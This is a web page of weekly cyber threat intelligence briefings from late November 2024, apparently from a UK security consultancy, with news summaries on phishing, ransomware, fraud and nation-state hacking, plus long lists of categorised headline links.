Your Kids Are Probably Compromising Your Online Security | Next Avenue
As Device Dependency Grows, So Do The Risks
Nordics move to deepen cyber security cooperation | Computer Weekly
Re/insurers’ operations exposed to cyber threats, says S&P - Reinsurance News
The UK’s cyber security strategy is no longer fit for purpose
Christmas is Coming: Cyber Security Lessons from the Holidays - Security Boulevard
In the new space race, hackers are hitching a ride into orbit
SQL Injection Prevention: 6 Strategies - Security Boulevard
The Legal Landscape Of Privacy: Why Lawyers Must Keep Up With Change - Above the Law
Microsoft confirms the Windows 11 TPM security requirement isn't going anywhere
Why OT environments are vulnerable – and what to do about it | SC Media
Almost all top US retailers were hacked in 2024 | Chain Store Age
Data-rich universities are both targets and treasure troves | Times Higher Education (THE)
Vulnerability Management
Microsoft Warns 400 Million PC Owners—This Ends Your Windows Updates
70% of open-source components are poorly or no longer maintained - Help Net Security
Report shows the threat of supply chain vulnerabilities from third-party products | TechRadar
Want to Grow Vulnerability Management into Exposure Management? Start Here!
Vulnerabilities
Cisco ASA flaw CVE-2014-2120 is being exploited in the wild
Android's December 2024 Security Update Patches 14 Vulnerabilities - SecurityWeek
Bootloader Vulnerability Impacts Over 100 Cisco Switches - SecurityWeek
Critical Vulnerability Found in Zabbix Network Monitoring Tool - SecurityWeek
CyberRatings report exposes critical flaws in cloud-native firewalls | SC Media
Cisco Warns of Exploitation of Decade-Old ASA WebVPN Vulnerability
CISA Warns of Active Exploitation of Flaws in Zyxel, ProjectSend, and CyberPanel
TP-Link Archer Zero-Day Vulnerability Let Attackers Inject Malicious Commands
Critical SailPoint IdentityIQ Vulnerability Exposes Files to Unauthorized Access
PoC exploit for critical WhatsUp Gold RCE vulnerability released (CVE-2024-8785) - Help Net Security
CISA Warns of Zyxel Firewall Vulnerability Exploited in Attacks - SecurityWeek
Japan warns of IO-Data zero-day router flaws exploited in attacks
Rather than fixing its old routers, D-Link is telling customers to upgrade
Sector Specific
Industry specific threat intelligence reports are available.
Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.
· Automotive
· Construction
· Critical National Infrastructure (CNI)
· Defence & Space
· Education & Academia
· Energy & Utilities
· Estate Agencies
· Financial Services
· FinTech
· Food & Agriculture
· Gaming & Gambling
· Government & Public Sector (including Law Enforcement)
· Health/Medical/Pharma
· Hotels & Hospitality
· Insurance
· Legal
· Manufacturing
· Maritime & Shipping
· Oil, Gas & Mining
· OT, ICS, IIoT, SCADA & Cyber-Physical Systems
· Retail & eCommerce
· Small and Medium Sized Businesses (SMBs)
· Startups
· Telecoms
· Third Sector & Charities
· Transport & Aviation
· Web3
Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.
Look out for our ‘Cyber Tip Tuesday’ video blog, also available on our YouTube channel.
You can also follow us on Facebook, Twitter and LinkedIn.
Links to articles are provided for interest and awareness only; linking to or reposting external content does not endorse any service or product, and we are not responsible for the security of external links.
Black Arrow Cyber Threat Intelligence Briefing 29 November 2024
Black Arrow Cyber Threat Intelligence Briefing 29 November 2024:
-Phishing Attacks Dominate Threat Landscape in Q3 2024
-Rising Cyber Threat Driven by Single Point of Failure Risk
-Cloned Customer Voice Beats Bank Security Checks
-Avoiding Cyber Complacency as a Small Business
-Your IT Infrastructure May Be More Outdated Than You Think
-Cyber Attacks Cost UK Businesses £44 Billion During Past 5 Years, Howden Survey
-83% of Organisations Reported Insider Attacks in 2024
-Blue Yonder Ransomware Attack Disrupts Supply Chains Across UK and US
-North Korean Hackers Steal $10M with AI-Driven Scams and Malware on LinkedIn
-UK Scam Losses Surge 50% Annually to £11.4bn
-In a Growing Threat Landscape, Companies Must do Three Things to Get Serious About Cyber Security
-Russian Threat Actors Poised to Cripple Power Grid, UK Warns
Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy-to-digest round-up of the most notable threats, vulnerabilities and cyber-related news from the last week.
Top Cyber Stories of the Last Week
Phishing Attacks Dominate Threat Landscape in Q3 2024
ReliaQuest's recent report reveals that spear phishing attacks accounted for 46% of security incidents in Q3 2024, becoming the most prevalent threat. High employee turnover and accessible phishing kits contribute to this trend, with untrained new hires increasing vulnerability. The report also highlights a 20% surge in cloud-based security threats and a 7% rise in insider threat activity, with cyber criminals offering up to $10,000 weekly for insider assistance. Despite awareness of these risks, organisations continue to face significant challenges in mitigating them.
Rising Cyber Threat Driven by Single Point of Failure Risk
CyberCube reports that escalating cloud service provider outages and single point of failure events are significantly increasing the risk of unplanned technology outages for organisations. These disruptions are accelerating, impacting critical services across sectors. The report highlights that the Energy & Utilities industry is highly exposed with varying security levels, while the Transportation & Logistics sector is exposed but more secure. Many US public sector entities are under-secured despite high exposure to cyber threats. It emphasises that insurers must adapt by refining policy language, enhancing threat intelligence, and collaborating with governments to mitigate these evolving risks.
Cloned Customer Voice Beats Bank Security Checks
Recent investigations have revealed that AI-cloned voices can bypass voice recognition security in banking systems. A BBC test showed that cloned voices successfully overcame voice ID checks at major banks, including Santander and Halifax. Despite assurances from banks about the security of voice ID, the ease with which these systems were breached, even using basic equipment, highlights significant vulnerabilities. Cyber security experts warn that the rapid advancement of generative AI presents new risks to biometric authentication methods. This raises concerns about the effectiveness of current security measures and underscores the need for enhanced protections against sophisticated AI-enabled fraud.
Avoiding Cyber Complacency as a Small Business
A recent survey revealed that half of all UK businesses, including many small and medium-sized enterprises, experienced a cyber attack in the past year. Despite this high incidence, only 22% have a formal incident response plan, indicating widespread cyber complacency. With the average cost to remedy an attack estimated at £21,000, small businesses are at significant financial risk. Many maintain outdated security measures and prioritise other concerns due to limited resources. To mitigate these risks, organisations are advised to stay vigilant, educate employees on threats like phishing, implement robust backup solutions, and develop clear disaster recovery plans.
Your IT Infrastructure May Be More Outdated Than You Think
Kyndryl's recent survey reveals a significant disconnect between CEOs and IT leaders regarding IT infrastructure readiness. While about two-thirds of CEOs are concerned their IT systems are outdated or nearing end-of-life, 90% of IT leaders believe their infrastructure is best in class. Contradictorily, only 39% of IT leaders feel prepared to manage future risks and disruptions, and 44% of executives admit their IT systems have aged past expected lifespans. The report underscores the need for continual reassessment of IT tools to balance operational needs with innovation, as outdated systems can quickly hinder an organisation's competitiveness.
Cyber Attacks Cost UK Businesses £44 Billion During Past 5 Years, Howden Survey
Howden's research has revealed that cyber attacks have cost UK businesses £44 billion in lost revenue over the past five years. Over half of these businesses, particularly those with revenues over £100 million, have suffered at least one cyber attack, with compromised emails and data theft being the most common causes. Despite this significant impact, the uptake of basic cyber security measures remains low, with only 61% using antivirus software and 55% employing network firewalls. The report suggests that implementing fundamental cyber security practices could reduce cyber attack costs by up to 75%, saving approximately £30 billion over five years.
83% of Organisations Reported Insider Attacks in 2024
A publication by news site Cybersecurity Insiders reports that 83% of organisations experienced at least one insider attack in the past year. The incidence of insider threats has escalated, with the percentage of organisations facing between 11 to 20 attacks increasing from 4% to 21% in the last 12 months. Despite 93% recognising the importance of strict visibility and control, only 36% have effective solutions in place. Recovery costs are significant, with 32% of organisations spending between $100,000 and $499,000, and 21% facing costs between $1 million and $2 million. Lack of employee awareness is a major factor, with 32% citing it as a contributor to attacks.
Blue Yonder Ransomware Attack Disrupts Supply Chains Across UK and US
Blue Yonder, a supply chain software company, has experienced a ransomware attack that disrupted services for major clients. The incident impacted key customers, including Starbucks and leading UK supermarkets like Morrisons and Sainsbury's, causing operational disruptions and forcing activation of contingency plans. Despite working with external cyber security experts, Blue Yonder has yet to provide a timeline for restoration. This event underscores the increasing vulnerability of supply chains to cyber attacks. A recent survey found that 62% of organisations faced ransomware attacks from software supply chain partners in the past year, highlighting the widespread nature of these threats.
North Korean Hackers Steal $10M with AI-Driven Scams and Malware on LinkedIn
Microsoft has reported that North Korean hackers have stolen over $10 million in cryptocurrency through sophisticated social engineering campaigns on LinkedIn. These cyber security threats are escalating, with attackers posing as recruiters or venture capitalists to trick targets into downloading malware. Despite increased awareness, organisations remain vulnerable as hackers use artificial intelligence tools to create convincing fake profiles and documents. North Korean IT workers abroad have also generated at least $370,000 through legitimate work, but pose additional risks by abusing access to steal intellectual property and demand ransoms.
UK Scam Losses Surge 50% Annually to £11.4bn
Cifas reports that UK online fraud losses have surged to over £11bn in the past year, a £4bn increase on the previous year. 15% of the 2,000 survey participants lost money to scammers in 2024, up from 10% in 2023, with average losses of £1,400 per victim. Fewer than a fifth recovered their money, and only 28% reported the incidents to the police. Email was the most common fraud channel, cited by nearly 70% of respondents. With scams expected to intensify during the holiday season, there is a pressing need for improved security measures and cross-sector collaboration.
In a Growing Threat Landscape, Companies Must do Three Things to Get Serious About Cyber Security
Enterprises are facing a more sophisticated threat landscape due to digital transformation, hybrid work, and AI adoption, making it imperative to prioritise cyber security. Leadership at the C-suite and board level must drive this change by investing appropriately, as underfunded security can lead to lost revenue and legal issues. A strong, empowered CISO is crucial for identifying vulnerabilities and guiding necessary actions. Adopting frameworks like NIST Cybersecurity Framework 2.0 helps organisations manage risks effectively, promoting prevention and response strategies that can also reduce liability in the event of a breach.
Russian Threat Actors Poised to Cripple Power Grid, UK Warns
The UK government warns that Russian cyber threat actors are poised to conduct cyber attacks that could disrupt critical national infrastructure, potentially "turning off the lights for millions". These threats have already targeted UK media, telecoms, and political institutions. However, experts caution that such rhetoric may overstate Russia's actual capabilities and risk causing unnecessary panic. In response, the government is investing £8.22 million in a new AI cyber lab to bolster national security and an additional £1 million to enhance incident response among allies.
Sources:
https://informationsecuritybuzz.com/phishing-attacks-dominate-threat-lands/
https://www.emergingrisks.co.uk/rising-cyber-threat-driven-by-single-point-of-failure-risk/
https://www.bbc.co.uk/news/articles/c1lg3ded6j9o
https://betanews.com/2024/11/28/avoiding-cyber-complacency-as-a-small-business/
https://www.cio.com/article/3610867/your-it-infrastructure-may-be-more-outdated-than-you-think.html
https://www.insurancejournal.com/news/international/2024/11/27/802913.htm
https://securityintelligence.com/articles/83-percent-organizations-reported-insider-threats-2024/
https://thehackernews.com/2024/11/north-korean-hackers-steal-10m-with-ai.html
https://www.infosecurity-magazine.com/news/uk-scam-losses-surge-50-annually/
Governance, Risk and Compliance
Cyber attacks cost British businesses $55 billion in past five years, broker says | Reuters
Beyond the Technical: The Evolving CISO - InfoRiskToday
What Does Enterprise-Wide Cyber Security Culture Look Like?
Cyber Security Under Threat: New Study Exposes 'Security Chaos' | Pressat
What is compliance risk? | Definition from TechTarget
Top challenges holding back CISOs’ agendas | CSO Online
The CISO as a Chess Piece: A Comprehensive Strategic Analysis | Mandelbaum Barrett PC - JDSupra
Cyber Security Toolkit for Boards: updated briefing pack... - NCSC.GOV.UK
Threats
Ransomware, Extortion and Destructive Attacks
Five Ransomware Groups Responsible for 40% of Cyber-Attacks in 2024 - Infosecurity Magazine
One of the nastiest ransomware groups around may have a whole new way of doing things | TechRadar
VPN Vulnerabilities Drive Nearly 30% Of Q3 Ransomware Attacks
CISA says BianLian ransomware now focuses only on data theft
The case for a ransomware payment ban - Tech Monitor
Growth in phishing, changes in ransomware crews mark threat landscape | SC Media
Pro-Russian Hacktivists Launch Branded Ransomware Operations - Infosecurity Magazine
Ransomware payments are now a critical business decision - Help Net Security
Ransomware Groups Targeting VPNs for Initial Access: Report | MSSP Alert
BlackBasta Ransomware Brand Picks Up Where Conti Left Off
CyberVolk analysis explores ransomware, hacktivism interconnections | SC Media
Mimic Ransomware: What You Need To Know | Tripwire
Zyxel firewalls targeted in recent ransomware attacks
Victims Must Disclose Ransom Payments Under Australian Law
Ransomware Victims
Microlise Confirms Data Breach as Ransomware Group Steps Forward - SecurityWeek
Blue Yonder ransomware attack disrupts supply chains across UK and US
Wake Up And Smell The Ransomware—Starbucks Impacted By Cyber Attack
Supply chain vendor Blue Yonder succumbs to ransomware • The Register
NHS declares major cyber incident for third time this year • The Register
Further disruption expected after latest NHS cyber attack | Computer Weekly
Phishing & Email Based Attacks
Phishing Attacks Dominate Threat Landscape In Q3 2024
Email Phishing and DMARC Statistics - Security Boulevard
Growth in phishing, changes in ransomware crews mark threat landscape | SC Media
Hackers Update Tactics to Bypass Multifactor Authentication - Petri IT Knowledgebase
Rise in phishing attacks observed from August to October 2024
Flying Under the Radar - Security Evasion Techniques
Phishing attacks via ‘URL rewriting’ to evade detection escalate | SC Media
Scammers use 'you're fired' lures in phishing campaign • The Register
“Sad announcement” email implies your friend has died | Malwarebytes
OpenSea NFT Phishers Aim to Drain Crypto Wallets
Email Is Insecure: 4 Reasons I Avoid It Like the Plague
Three-Quarters of Black Friday Spam Emails Identified as Scams - Infosecurity Magazine
Business Email Compromise (BEC)/Email Account Compromise (EAC)
Other Social Engineering
North Korean Hackers Steal $10M with AI-Driven Scams and Malware on LinkedIn
How to recognize employment fraud before it becomes a security issue - Help Net Security
Meta Finally Breaks Its Silence on Pig Butchering | WIRED
Bangkok busts SMS Blaster sending 1 million scam texts from a van
North Korea Deploying Fake IT Workers in China, Russia, Other Countries - SecurityWeek
Artificial Intelligence
Cloned customer voice beats bank security checks - BBC News
North Korean Hackers Steal $10M with AI-Driven Scams and Malware on LinkedIn
Over a Third of Firms Struggling With Shadow AI - Infosecurity Magazine
AI in cyber security: Not yet autonomous, but the time to prepare is now
British spies to ramp up fight against Russian cyber threats with launch of cutting-edge... - LBC
Britain, NATO must stay ahead in 'new AI arms race', says UK minister | Reuters
Faux ChatGPT, Claude API Packages Deliver JarkaStealer
AI is the latest tool in the cyber security cat-and-mouse game - Fast Company
AI Used for Good and Bad — Like Making Trickier Malware, Says Report
Teaching AI to Hack: Researchers Demonstrate ChatGPT's to Ethically Hack Linux & Windows
Organisations unprepared for the AI onslaught must do these 4 things | ZDNET
'Tis the season for website cloning tools, RCEs and AI phishing lures | SC Media
2FA/MFA
‘Adversary in the middle attacks’ are becoming hackers’ go-to method to bypass MFA | ITPro
Hackers Update Tactics to Bypass Multifactor Authentication - Petri IT Knowledgebase
Malware
North Korean Hackers Steal $10M with AI-Driven Scams and Malware on LinkedIn
2024 saw a surge in malicious free VPN apps | TechRadar
Russian Hackers Deploy HATVIBE and CHERRYSPY Malware Across Europe and Asia
Novel WolfsBane backdoor leveraged in Chinese attacks against Linux systems | SC Media
Salt Typhoon hackers backdoor telcos with new GhostSpider malware
What cyber attacks are bots commonly associated with?
Aggressive Chinese APT Group Targets Governments with New Backdoors - Infosecurity Magazine
Chinese Hackers Use GHOSTSPIDER Malware to Hack Telecoms Across 12+ Countries
Skimmer Malware Targets Magento Sites Ahead of Black Friday
APT-K-47 Uses Hajj-Themed Lures to Deliver Advanced Asyncshell Malware
Hackers abuse Avast anti-rootkit driver to disable defences
Researchers Uncover Malware Using BYOVD to Bypass Antivirus Protections
IoT Device Traffic Up 18% as Malware Attacks Surge 400% - Infosecurity Magazine
The source code of Banshee Stealer leaked online
Faux ChatGPT, Claude API Packages Deliver JarkaStealer
How Facebook and Instagram Malware Works (and How to Spot It Before You Click)
Researchers Discover "Bootkitty" – First UEFI Bootkit Targeting Linux Kernels
AI Used for Good and Bad — Like Making Trickier Malware, Says Report
APT-C-60 Hackers Exploit StatCounter and Bitbucket in SpyGlace Malware Campaign
Gaming Engines: An Undetected Playground for Malware Loaders - Check Point Research
Bots/Botnets
What cyber attacks are bots commonly associated with?
Growing Matrix Botnet Poses Escalating Global Threat
Mobile
Why you should power off your phone once a week - according to the NSA | ZDNET
One Down, Many to Go with Pre-Installed Malware on Android | Electronic Frontier Foundation
Denial of Service/DoS/DDoS
Here’s how simple it is for script kiddies to stand up DDoS services | CyberScoop
Is Your Router In The Matrix—35 Million Devices Under Blue Pill Attack
Internet of Things – IoT
My Car Knows My Secrets, and I'm (Mostly) OK With That
Growing Matrix Botnet Poses Escalating Global Threat
IoT Device Traffic Up 18% as Malware Attacks Surge 400% - Infosecurity Magazine
Data Breaches/Leaks
Prison layouts reportedly leaked on dark web in data breach - BBC News
Data leaks from websites built on Microsoft Power Pages, including 1.1 million NHS records
New York Fines Geico and Travelers $11 Million Over Data Breaches - SecurityWeek
A US soldier is suspected of being behind the massive Snowflake data leak | CSO Online
Data broker leaves 600K+ sensitive files exposed online • The Register
TfL cyber attack: Independent review will examine huge hack and response | The Standard
Military dating site leaves database with 1M records exposed | Biometric Update
HIA: Survivors awarded £30,000 after data breach - BBC News
Zello asks users to reset passwords after security incident
Hack Against Andrew Tate Continues With Leak Of Staff Chats
Hackers Breach Andrew Tate's Online 'University,' Exposing 800,000 Users
Organised Crime & Criminal Actors
The rise and fall of the 'Scattered Spider' hackers | TechCrunch
Major cyber crime crackdowns signal shift in global cyber security strategies
Interpol: Major cyber crime operation nets 1,006 suspects – DataBreaches.Net
Authorities disrupt major cyber crime operation, 1000+ suspects arrested - Help Net Security
US alleges man is cyber crook with distaste for opsec • The Register
DoJ seized credit card marketplace PopeyeTools
DOJ: Man hacked networks to pitch cyber security services
'Hacker' breaks into gym to get hired, gets arrested instead | PCWorld
Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain
Crypto Hacks Drop 15% Year-to-Date, over $70 Million Lost in November
OpenSea NFT Phishers Aim to Drain Crypto Wallets
Insider Risk and Insider Threats
83% of organisations reported insider attacks in 2024
Human Factors in Cyber Security in 2024 | UpGuard
Insurance
Cyber attacks cost British businesses $55 billion in past five years, broker says | Reuters
Supply Chain and Third Parties
Rising cyber threat driven by Single Point of Failure risk
Blue Yonder ransomware attack disrupts supply chains across UK and US
Wake Up And Smell The Ransomware—Starbucks Impacted By Cyber Attack
Supply chain vendor Blue Yonder succumbs to ransomware • The Register
Outages
Microsoft CEO Nadella Calls for 'Culture Change' After Security Lapses - Business Insider
Rising cyber threat driven by Single Point of Failure risk
Microsoft 365 outage impacts Exchange Online, Teams, SharePoint
Microsoft aims for better Windows security • The Register
CrowdStrike still doesn’t know cost of Falcon flame-out • The Register
Encryption
Albanian Drug Smugglers Busted After Cops Decrypt Comms - Infosecurity Magazine
Linux and Open Source
Novel WolfsBane backdoor leveraged in Chinese attacks against Linux systems | SC Media
Researchers Discover "Bootkitty" – First UEFI Bootkit Targeting Linux Kernels
Passwords, Credential Stuffing & Brute Force Attacks
I Ran a Password Audit and Was Surprised How Many Outdated Passwords I Have
Zello asks users to reset passwords after security incident
Stop Using Your Passwords—1Password And Google Warn
Social Media
North Korean Hackers Steal $10M with AI-Driven Scams and Malware on LinkedIn
Meta Finally Breaks Its Silence on Pig Butchering | WIRED
Meta Shutters Two Million Scam Accounts in Pig Butchering Crackdown - Infosecurity Magazine
How Facebook and Instagram Malware Works (and How to Spot It Before You Click)
Regulations, Fines and Legislation
The EU Cyber Resilience Act: Implications for Companies | Hogan Lovells - JDSupra
New York Fines Geico and Travelers $11 Million Over Data Breaches - SecurityWeek
EU: Cyber Resilience Act published in EU Official Journal | DLA Piper - JDSupra
HIA: Survivors awarded £30,000 after data breach - BBC News
US senators propose mandated MFA, encryption in healthcare • The Register
Opportunities for Regulatory Harmonization Under Trump's Deregulation Agenda
Telecoms Security Act Compliance... - Analysis - Mobile News
Cyber security bill passes parliament - Security - iTnews
Victims Must Disclose Ransom Payments Under Australian Law
Models, Frameworks and Standards
The EU Cyber Resilience Act: Implications for Companies | Hogan Lovells - JDSupra
EU: Cyber Resilience Act published in EU Official Journal | DLA Piper - JDSupra
Why Cyber Security Leaders Trust the MITRE ATT&CK Evaluations
Careers, Working in Cyber and Information Security
Practical strategies to build an inclusive culture in cyber security - Help Net Security
8 Tips for Hiring Neurodivergent Talent
Why IT Leaders Should Hire Veterans for Cyber Security Roles
How cyber security certification can drive business growth - Digital Journal
The Next Hot Cyber Security Skill for Your Resume? Empathy
Law Enforcement Action and Take Downs
The rise and fall of the 'Scattered Spider' hackers | TechCrunch
Major cyber crime crackdowns signal shift in global cyber security strategies
Interpol: Major cyber crime operation nets 1,006 suspects – DataBreaches.Net
Authorities disrupt major cyber crime operation, 1000+ suspects arrested - Help Net Security
Bangkok busts SMS Blaster sending 1 million scam texts from a van
US alleges man is cyber crook with distaste for opsec • The Register
DoJ seized credit card marketplace PopeyeTools
Telco engineer spying on employer for Beijing gets 4 years • The Register
US Citizen Sentenced for Spying on Behalf of China's Intelligence Agency
Albanian Drug Smugglers Busted After Cops Decrypt Comms - Infosecurity Magazine
DOJ: Man hacked networks to pitch cyber security services
'Hacker' breaks into gym to get hired, gets arrested instead | PCWorld
Police bust pirate streaming service making €250 million per month
Misinformation, Disinformation and Propaganda
Google Deindexes Chinese Propaganda Network - Infosecurity Magazine
Google blocked 1000 pro China websites from services • The Register
Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity
Cyber Warfare and Cyber Espionage
Britain, NATO must stay ahead in 'new AI arms race', says UK minister | Reuters
“Cyber war is now a daily reality”, UK government minister says
UK calls for stronger NATO cyber defences
5th Generation War: A War Without Borders and its Impact on Global Security - Modern Diplomacy
Nation State Actors
China
The Cyberthreats from China are Ongoing: U.S. Officials - Security Boulevard
Chinese Hackers Use GHOSTSPIDER Malware to Hack Telecoms Across 12+ Countries
Chinese vessel 'sabotaged' Baltic deep sea cables and may have been under orders from Russia
Satellite Image Shows Chinese Ship Suspected of Sabotage in 'NATO Lake' - Newsweek
Salt Typhoon’s cyber storm reaches beyond US telcos • The Register
Chinese hackers preparing for conflict, says US cyber official | The Straits Times
Novel WolfsBane backdoor leveraged in Chinese attacks against Linux systems | SC Media
China's Cyber Offensives Helped by Private Firms, Academia
Accident or sabotage? American and European officials disagree as key undersea cables are cut | CNN
Google Deindexes Chinese Propaganda Network - Infosecurity Magazine
China's telco attacks mean 'thousands' of boxes compromised • The Register
Top senator calls Salt Typhoon “worst telecom hack in our nation’s history” - The Washington Post
CrowdStrike identifies new China hackers breaching telecom networks
NSA Director Wants Industry to Disclose Details of Telecom Hacks - Bloomberg
T-Mobile Engineers Spotted Hackers Running Commands on Routers - Bloomberg
Game of Emperor: Unveiling Long Term Earth Estries Cyber Intrusions | Trend Micro (US)
US must counter new Chinese cyber attacks. Remember how it lost nuclear monopoly?
China Concealing State, Corporate & Academic Assets For Offensive Attacks
China’s Surveillance State Is Selling Citizen Data as a Side Hustle | WIRED
Aggressive Chinese APT Group Targets Governments with New Backdoors - Infosecurity Magazine
Google blocked 1000 pro China websites from services • The Register
Telco engineer spying on employer for Beijing gets 4 years • The Register
US Citizen Sentenced for Spying on Behalf of China's Intelligence Agency
Imagine a land where algorithms don't ruin the Internet • The Register
Russia
Britain should prepare for 'aggressive and reckless' Russian cyber attacks, minister warns
Chinese vessel 'sabotaged' Baltic deep sea cables and may have been under orders from Russia
Russian Cyberespionage Group Hit 60 Victims in Asia, Europe - SecurityWeek
Russian Spies Jumped From One Network to Another Via Wi-Fi in an Unprecedented Hack | WIRED
Nato countries are in a ‘hidden cyber war’ with Russia, says Liz Kendall | The Standard
Britain, NATO must stay ahead in 'new AI arms race', says UK minister | Reuters
Nato countries in 'hidden cyber war' with Russia, minister warns | ITV News
Russian hybrid attacks may lead to NATO invoking Article 5, says German intel chief | Reuters
Accident or sabotage? American and European officials disagree as key undersea cables are cut | CNN
RomCom Exploits Zero-Day Firefox and Windows Flaws in Sophisticated Cyber Attacks
Firefox and Windows zero-days exploited by Russian RomCom hackers
Is Your Router In The Matrix—35 Million Devices Under Blue Pill Attack
Russia-linked APT TAG-110 targets Europe and Asia - Security Affairs
'Operation Undercut' Adds to Russia Influence Campaigns
CyberVolk analysis explores ransomware, hacktivism interconnections | SC Media
CISA says BianLian ransomware now focuses only on data theft
Here’s how simple it is for script kiddies to stand up DDoS services | CyberScoop
Pro-Russian Hacktivists Launch Branded Ransomware Operations - Infosecurity Magazine
North Korea
North Korean Hackers Steal $10M with AI-Driven Scams and Malware on LinkedIn
North Korea Deploying Fake IT Workers in China, Russia, Other Countries - SecurityWeek
Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence
APT-C-60 Hackers Exploit StatCounter and Bitbucket in SpyGlace Malware Campaign
Man warns 'this is just the beginning' after cyber attack on Merseyside Police - Liverpool Echo
Tools and Controls
VPN Vulnerabilities Drive Nearly 30% Of Q3 Ransomware Attacks
2024 saw a surge in malicious free VPN apps | TechRadar
How to recognize employment fraud before it becomes a security issue - Help Net Security
AI in cyber security: Not yet autonomous, but the time to prepare is now
Email Phishing and DMARC Statistics - Security Boulevard
Ransomware Groups Targeting VPNs for Initial Access: Report | MSSP Alert
Microsoft Teams monitoring tips for admins | TechTarget
What is compliance risk? | Definition from TechTarget
Is Cyber Threat Intelligence Worthless? - Security Boulevard
Machine Learning in Cyber Security: Harnessing the Power of Five AI Tribes - Security Boulevard
CIOs warned of AI over-reliance in cyber security defence
AI Used for Good and Bad — Like Making Trickier Malware, Says Report
Modern workplaces increasingly resemble surveillance zones • The Register
The role of data recovery in cyber resilience
AI is the latest tool in the cyber security cat-and-mouse game - Fast Company
Businesses prioritize cyber security in digital transformation: GSMAi
Data Security Best Practices: 7 Tips to Crush Bad Actors | MSSP Alert
Cloudflare says it lost 55% of logs pushed to customers for 3.5 hours
DOJ: Man hacked networks to pitch cyber security services
'Hacker' breaks into gym to get hired, gets arrested instead | PCWorld
The ‘Great IT Rebrand’: Restructuring IT for business success | CIO
Other News
Your beloved old tech is a security risk. It's time to let go | PCWorld
Latest Multi-Stage Attack Scenarios with Real-World Examples
Avoiding cyber complacency as a small business
Will 2025 be the turning point for cyber security in finance? - FinTech Futures: Fintech news
Microsoft CEO Nadella Calls for 'Culture Change' After Security Lapses - Business Insider
Microsoft aims for better Windows security • The Register
The threats of USB-based attacks for critical infrastructure | TechRadar
The industries impacted most by cyber crime in 2024
Cyber Attacks On Healthcare: A Global Threat That Can’t Be Ignored | Scoop News
Six future-proofing strategies family offices need to stay ahead
The rise in public sector cyber attacks and what can be done | London City Hall
TfL cyber attack: Independent review will examine huge hack and response | The Standard
Craigslist founder on his $100M pledge to fight cyber attacks on US
DOJ Will Reportedly Force Google to Sell Off Chrome Browser
10 Of The Worst Cyber Security Mistakes You're Probably Making Right Now
Protect your charity from cyber crime - GOV.UK
Forensic audit of the US election is needed to protect democracy
Vulnerability Management
VPN Vulnerabilities Drive Nearly 30% Of Q3 Ransomware Attacks
400,000 Systems Potentially Exposed to 2023's Most Exploited Flaws - SecurityWeek
Google’s AI-powered fuzzing tool discovers 26 new vulnerabilities | SC Media
How should software producers be held accountable for shoddy cyber security products?
The effect of compliance requirements on vulnerability management strategies - Help Net Security
Vulnerabilities
Researchers reveal exploitable flaws in corporate VPN clients - Help Net Security
Critical 7-Zip Vulnerability Let Attackers Execute Arbitrary Code
Firefox and Windows zero-days exploited by Russian RomCom hackers
Hackers abuse Avast anti-rootkit driver to disable defences
Microsoft Patches Exploited Vulnerability in Partner Network Website - SecurityWeek
WordPress Plugin Flaw Exposes 200,000 WordPress Sites To Hacking
VMware Patches High-Severity Vulnerabilities in Aria Operations - SecurityWeek
Hackers exploit critical bug in Array Networks SSL VPN products
Researchers Uncover Malware Using BYOVD to Bypass Antivirus Protections
Zyxel firewalls targeted in recent ransomware attacks
Malicious Actors Exploit ProjectSend Critical Vulnerability - Infosecurity Magazine
Critical QNAP Vulnerability Let Attackers Execute Remote Code
IBM Patches RCE Vulnerabilities in Data Virtualization Manager, Security SOAR - SecurityWeek
Weekend QNAP, Veritas bugs hit patch pipelines • The Register
Sector Specific
Industry-specific threat intelligence reports are available.
Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.
· Automotive
· Construction
· Critical National Infrastructure (CNI)
· Defence & Space
· Education & Academia
· Energy & Utilities
· Estate Agencies
· Financial Services
· FinTech
· Food & Agriculture
· Gaming & Gambling
· Government & Public Sector (including Law Enforcement)
· Health/Medical/Pharma
· Hotels & Hospitality
· Insurance
· Legal
· Manufacturing
· Maritime & Shipping
· Oil, Gas & Mining
· OT, ICS, IIoT, SCADA & Cyber-Physical Systems
· Retail & eCommerce
· Small and Medium Sized Businesses (SMBs)
· Startups
· Telecoms
· Third Sector & Charities
· Transport & Aviation
· Web3
Contact us to help assess where your risks lie and to ensure you are doing all you can to keep you and your business secure.
Look out for our ‘Cyber Tip Tuesday’ video blog, also available on our YouTube channel.
You can also follow us on Facebook, Twitter and LinkedIn.
Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.
Black Arrow Cyber Threat Intelligence Briefing 22 November 2024
Black Arrow Cyber Threat Intelligence Briefing 22 November 2024:
-Cyber Security Dominates Concerns Among the C-Suite, Small Businesses and the Nation
-Cyber Criminals Don’t Take Holidays Warns Expert
-The Urgent and Critical Need to Prioritise Mobile Security
-Companies Take Over Seven Months to Recover from Cyber Incidents
-Data is the New Uranium – Incredibly Powerful and Amazingly Dangerous
-‘Scam Yourself’ Attacks Just Increased Over 600% - Here’s What to Look For
-60% of Emails with QR Codes Classified as Spam or Malicious
-Coalition Highlights 68% Surge in Ransomware Claims Severity, as Active Ransomware Groups Increase 56%
-One Deepfake Digital Identity Attack Strikes Every Five Minutes
-Supply Chain Attacks Up Over 400 Percent Since 2021
-Rethinking Cyber Security from Cost Centre to Value Driver
-Majority of UK Businesses Lack Readiness for Rising AI-Led Phishing Attacks, Reveals Survey
Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy-to-digest round-up of the most notable threats, vulnerabilities, and cyber related news from the last week.
Top Cyber Stories of the Last Week
Cyber Security Dominates Concerns Among the C-Suite, Small Businesses and the Nation
Cyber security is now the top concern for organisations globally, with the 2024 Allianz Risk Barometer naming cyber events as the number one business risk. Gartner forecasts a 15% increase in information security spending by 2025, reaching $212 billion. Small businesses are also vulnerable, with 60% ranking cyber security risks as major concerns. Generative AI introduces new threats, and Gartner predicts that by 2027, 17% of cyber attacks and data leaks will involve generative AI.
